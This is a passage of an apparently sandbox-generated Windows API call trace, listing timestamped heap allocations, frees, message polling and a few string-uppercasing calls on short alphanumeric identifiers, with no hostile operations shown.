hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0215.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0215.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0215.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0215.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0215.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0215.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0215.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.780] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.781] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.781] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0215.781] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.781] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0215.782] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab740 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0215.782] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.782] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0215.782] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0215.783] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.784] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0215.784] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.784] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8c0 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74478 [0215.784] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.784] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0215.785] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0215.785] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.786] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74478 | out: hHeap=0x2af0000) returned 1 [0215.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0215.786] HeapFree (in: hHeap=0x2af0000, 